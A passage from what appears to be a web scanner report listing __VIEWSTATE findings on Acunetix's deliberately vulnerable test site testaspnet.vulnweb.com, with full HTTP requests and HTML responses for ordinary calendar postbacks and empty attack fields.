advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1157 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,157 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8264&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABsdQc9oIHgJTRBYBBgBAom3jf9oIZGRkDZEwtN4jTSd2aHrjTjWDjE17N3c%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKBwtXjAQKcisLvAQLiidrKBQL7pJ3HDAL7pJ3HDAL7pPGsCQL7pPGsCQL7pOXDAgL7pOXDAgLcy%2FfoBQLcy%2FfoBQLcy%2BuPDQLcy%2BuPDQLcy5%2BiBgLcy5%2BiBgLcy7P5DwLcy7P5DwLcy6ecBwLcy6ecBwLcy9swAtzL2zAC3MvP1wkC3MvP1wkC3Mvj6gIC3Mvj6gIC3MvX0w8C3MvX0w8C3MvL9ggC3MvL9ggCsdLVnwoCsdLVnwoCsdLJsgMCsdLJsgMCsdL9yQwCsdL9yQwCsdKR7AUCsdKR7AUCsdKFgw0CsdKFgw0CsdK5pgYCsdK5pgYCsdKt%2FQ8CsdKt%2FQ8CsdLBkQcCsdLBkQcCsdK1%2BQUCsdK1%2BQUCsdKpnA0CsdKpnA0Civm7BQKK%2BbsFAor5r9gJAor5r9gJAor5w%2FwCAor5w%2FwCAor595MKAor595MKAor567YDAor567YDAor5n80MAor5n80MAor5s%2BAFAor5s%2BAFAor5p4cNAor5p4cNAor5m%2BwLAor5m%2BwLAor5j4MDAor5j4MDAr%2BT%2B8QJAr%2BT%2B8QJAr%2BT75sBAr%2BT75sBAr%2BTg74KAr%2BTg74KAr%2BTt9UDAr%2BTt9UDAr%2BTq%2BgMAr%2BTq%2BgMAr%2BT34wEAr%2BT34wEAr%2BT86MNAr%2BT86MNAr%2BT58YGAr%2BT58YGAr%2BT268DAr%2BT268DUmI6Yo0MKViZ1hfUwnCBrvQTAnI%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:26:36 GMT Content-Length: 12565
Response Body - size: 12,565 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABsdQc9oIHgJTRBYBBgBAom3jf9oIZGRkDZEwtN4jTSd2aHrjTjWDjE17N3c=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKBwtXjAQKcisLvAQLiidrKBQL7pJ3HDAL7pJ3HDAL7pPGsCQL7pPGsCQL7pOXDAgL7pOXDAgLcy/foBQLcy/foBQLcy+uPDQLcy+uPDQLcy5+iBgLcy5+iBgLcy7P5DwLcy7P5DwLcy6ecBwLcy6ecBwLcy9swAtzL2zAC3MvP1wkC3MvP1wkC3Mvj6gIC3Mvj6gIC3MvX0w8C3MvX0w8C3MvL9ggC3MvL9ggCsdLVnwoCsdLVnwoCsdLJsgMCsdLJsgMCsdL9yQwCsdL9yQwCsdKR7AUCsdKR7AUCsdKFgw0CsdKFgw0CsdK5pgYCsdK5pgYCsdKt/Q8CsdKt/Q8CsdLBkQcCsdLBkQcCsdK1+QUCsdK1+QUCsdKpnA0CsdKpnA0Civm7BQKK+bsFAor5r9gJAor5r9gJAor5w/wCAor5w/wCAor595MKAor595MKAor567YDAor567YDAor5n80MAor5n80MAor5s+AFAor5s+AFAor5p4cNAor5p4cNAor5m+wLAor5m+wLAor5j4MDAor5j4MDAr+T+8QJAr+T+8QJAr+T75sBAr+T75sBAr+Tg74KAr+Tg74KAr+Tt9UDAr+Tt9UDAr+Tq+gMAr+Tq+gMAr+T34wEAr+T34wEAr+T86MNAr+T86MNAr+T58YGAr+T58YGAr+T268DAr+T268DUmI6Yo0MKViZ1hfUwnCBrvQTAnI=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8217')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">August 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8279')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8254')" style="color:Black" title="August 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8255')" style="color:Black" title="August 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8256')" style="color:Black" title="August 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8257')" style="color:Black" title="August 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8258')" style="color:Black" title="August 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8259')" style="color:Black" title="August 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8260')" style="color:Black" title="August 13">13</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8261')" style="color:Black" title="August 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8262')" style="color:Black" title="August 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8263')" style="color:Black" title="August 16">16</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8264')" style="color:White" title="August 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8265')" style="color:Black" title="August 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8266')" style="color:Black" title="August 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8267')" style="color:Black" title="August 20">20</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8268')" style="color:Black" title="August 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8269')" style="color:Black" title="August 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8270')" style="color:Black" title="August 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8271')" style="color:Black" title="August 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8272')" style="color:Black" title="August 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8273')" style="color:Black" title="August 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8274')" style="color:Black" title="August 27">27</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8275')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8276')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8277')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8278')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8279')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8280')" style="color:Black" title="September 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8281')" style="color:Black" title="September 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8282')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8283')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8284')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8285')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8286')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8287')" style="color:Black" title="September 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8288')" style="color:Black" title="September 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1163 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,163 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8252&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABsdQc9oIHgJTRBYBBgBArXB1dtoIZGRkjqZuSdovdiyPku0om8TBnHy%2FohE%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwL2lLbtCAKcisLvAQLiidrKBQL7pJ3HDAL7pJ3HDAL7pPGsCQL7pPGsCQL7pOXDAgL7pOXDAgLcy%2FfoBQLcy%2FfoBQLcy%2BuPDQLcy%2BuPDQLcy5%2BiBgLcy5%2BiBgLcy7P5DwLcy7P5DwLcy6ecBwLcy6ecBwLcy9swAtzL2zAC3MvP1wkC3MvP1wkC3Mvj6gIC3Mvj6gIC3MvX0w8C3MvX0w8C3MvL9ggC3MvL9ggCsdLVnwoCsdLVnwoCsdLJsgMCsdLJsgMCsdL9yQwCsdL9yQwCsdKR7AUCsdKR7AUCsdKFgw0CsdKFgw0CsdK5pgYCsdK5pgYCsdKt%2FQ8CsdKt%2FQ8CsdLBkQcCsdLBkQcCsdK1%2BQUCsdK1%2BQUCsdKpnA0CsdKpnA0Civm7BQKK%2BbsFAor5r9gJAor5r9gJAor5w%2FwCAor5w%2FwCAor595MKAor595MKAor567YDAor567YDAor5n80MAor5n80MAor5s%2BAFAor5s%2BAFAor5p4cNAor5p4cNAor5m%2BwLAor5m%2BwLAor5j4MDAor5j4MDAr%2BT%2B8QJAr%2BT%2B8QJAr%2BT75sBAr%2BT75sBAr%2BTg74KAr%2BTg74KAr%2BTt9UDAr%2BTt9UDAr%2BTq%2BgMAr%2BTq%2BgMAr%2BT34wEAr%2BT34wEAr%2BT86MNAr%2BT86MNAr%2BT58YGAr%2BT58YGAr%2BT268DAr%2BT268DxKq%2BG95BR4NnLSJsslFqeUtX%2FHs%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:52:57 GMT Content-Length: 12565
Response Body - size: 12,565 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABsdQc9oIHgJTRBYBBgBArXB1dtoIZGRkjqZuSdovdiyPku0om8TBnHy/ohE=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwL2lLbtCAKcisLvAQLiidrKBQL7pJ3HDAL7pJ3HDAL7pPGsCQL7pPGsCQL7pOXDAgL7pOXDAgLcy/foBQLcy/foBQLcy+uPDQLcy+uPDQLcy5+iBgLcy5+iBgLcy7P5DwLcy7P5DwLcy6ecBwLcy6ecBwLcy9swAtzL2zAC3MvP1wkC3MvP1wkC3Mvj6gIC3Mvj6gIC3MvX0w8C3MvX0w8C3MvL9ggC3MvL9ggCsdLVnwoCsdLVnwoCsdLJsgMCsdLJsgMCsdL9yQwCsdL9yQwCsdKR7AUCsdKR7AUCsdKFgw0CsdKFgw0CsdK5pgYCsdK5pgYCsdKt/Q8CsdKt/Q8CsdLBkQcCsdLBkQcCsdK1+QUCsdK1+QUCsdKpnA0CsdKpnA0Civm7BQKK+bsFAor5r9gJAor5r9gJAor5w/wCAor5w/wCAor595MKAor595MKAor567YDAor567YDAor5n80MAor5n80MAor5s+AFAor5s+AFAor5p4cNAor5p4cNAor5m+wLAor5m+wLAor5j4MDAor5j4MDAr+T+8QJAr+T+8QJAr+T75sBAr+T75sBAr+Tg74KAr+Tg74KAr+Tt9UDAr+Tt9UDAr+Tq+gMAr+Tq+gMAr+T34wEAr+T34wEAr+T86MNAr+T86MNAr+T58YGAr+T58YGAr+T268DAr+T268DxKq+G95BR4NnLSJsslFqeUtX/Hs=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8217')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">August 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8279')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:White" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8254')" style="color:Black" title="August 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8255')" style="color:Black" title="August 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8256')" style="color:Black" title="August 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8257')" style="color:Black" title="August 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8258')" style="color:Black" title="August 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8259')" style="color:Black" title="August 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8260')" style="color:Black" title="August 13">13</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8261')" style="color:Black" title="August 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8262')" style="color:Black" title="August 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8263')" style="color:Black" title="August 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8264')" style="color:Black" title="August 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8265')" style="color:Black" title="August 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8266')" style="color:Black" title="August 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8267')" style="color:Black" title="August 20">20</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8268')" style="color:Black" title="August 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8269')" style="color:Black" title="August 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8270')" style="color:Black" title="August 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8271')" style="color:Black" title="August 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8272')" style="color:Black" title="August 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8273')" style="color:Black" title="August 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8274')" style="color:Black" title="August 27">27</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8275')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8276')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8277')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8278')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8279')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8280')" style="color:Black" title="September 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8281')" style="color:Black" title="September 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8282')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8283')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8284')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8285')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8286')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8287')" style="color:Black" title="September 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8288')" style="color:Black" title="September 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by 